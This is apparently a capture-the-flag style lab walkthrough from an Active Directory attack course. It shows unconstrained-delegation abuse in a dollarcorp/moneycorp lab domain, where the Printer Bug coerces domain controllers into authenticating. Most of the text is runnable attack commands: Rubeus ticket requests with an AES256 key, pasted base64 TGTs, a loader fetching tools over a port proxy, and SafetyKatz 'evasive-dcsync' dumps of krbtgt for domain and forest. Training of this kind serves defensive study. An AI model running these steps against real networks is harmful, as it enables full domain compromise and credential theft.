15 - LO1️5️
Learning Object 15
Tasks
1 - Find a server in the dcorp domain where Unconstrained Delegation is enabled
2 - Compromise the server and escalate to Domain Admin privileges
3 - Escalate to Enterprise Admins privileges by abusing Printer Bug
Flag 24 [dcorp-appsrv] - Domain user who is a local admin on dcorp-appsrv 🚩
Flag 25 [dcorp-appsrv] - Which user's credentials are compromised by using the printer bug for compromising dollarcorp 🚩
Solutions
1 - Find a server in the dcorp domain where Unconstrained Delegation is enabled
Starting to find a server that has unconstrained delegation enabled:
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\PowerView.ps1
Get-DomainComputer -Unconstrained | select -ExpandProperty name

DCORP-DC
DCORP-APPSRV
2 - Compromise the server and escalate to Domain Admin privileges
Remembering that the prerequisite for elevation using Unconstrained delegation is having admin access to the machine, we need to compromise a user which has local admin access on appsrv.
We extracted secrets of appadmin, srvadmin and websvc from dcorp-adminsrv. Let's check if anyone of them have local admin privileges on dcorp-appsrv.
First, we will try with appadmin. Run the below command from an elevated command prompt:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:appadmin /aes256:68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
and Run the below commands in the new process:
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess -Domain dollarcorp.moneycorp.local

We can use multiple methods now to copy Rubeus to dcorp-appsrv to abuse Printer Bug using Loader and winrs.
Run the below command from the process running appadmin:
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-appsrv\C$\Users\Public\Loader.exe /Y
Run Rubeus in listener mode in the winrs session on dcorp-appsrv:
winrs -r:dcorp-appsrv cmd
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.67
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/Rubeus.exe -args monitor /targetuser:DCORP-DC$ /interval:5 /nowrap

Now, we can use the Printer Bug for Coercion, so on the student VM, use MS-RPRN to force authentication from dcorp-dc$ (remember to charge program into HFS every time)
C:\AD\Tools\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local
On the Rubeus listener, we can see the TGT of dcorp-dc$:

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
Copy the base64 encoded ticket and use it with Rubeus on student VM. Run the below command from an elevated shell as the SafetyKatz command that we will use for DCSync needs to be run from an elevated process:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args ptt /ticket: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

Now, we can run DCSync from this process:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::evasive-dcsync /user:dcorp\krbtgt" "exit"

3 - Escalate to Enterprise Admins privileges by abusing Printer Bug
To get Enterprise Admin privileges, we need to force authentication from mcorp-dc. Run the below command to listern for mcorp-dc$ tickets on dcorp-appsrv:
winrs -r:dcorp-appsrv cmd
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/Rubeus.exe -args monitor /targetuser:MCORP-DC$ /interval:5 /nowrap
Use MS-RPRN on the student VM to trigger authentication from mcorp-dc to dcorp-appsrv
C:\AD\Tools\MS-RPRN.exe \\mcorp-dc.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local
On the Rubeus listener, we can see the TGT of mcorp-dc$:

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
As previously, copy the base64 encoded ticket and use it with Rubeus on student VM. Run the below command from an elevated shell as the SafetyKatz command that we will use for DCSync needs to be run from an elevated process:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args ptt /ticket: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
Now, we can run DCSync from this process:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::evasive-dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"

We escalated to Enterprise Admins too.
Flag 24 [dcorp-appsrv] - Domain user who is a local admin on dcorp-appsrv 🚩
Based on the previous task, we know that domain user who is a local admin on dcorp-appsrv is: appXXX
Flag 25 [dcorp-appsrv] - Which user's credentials are compromised by using the printer bug for compromising dollarcorp 🚩
Checking the previous task, in details the output of Rubeus listener, we can see the TGT of dcorp-dc$:

Last updated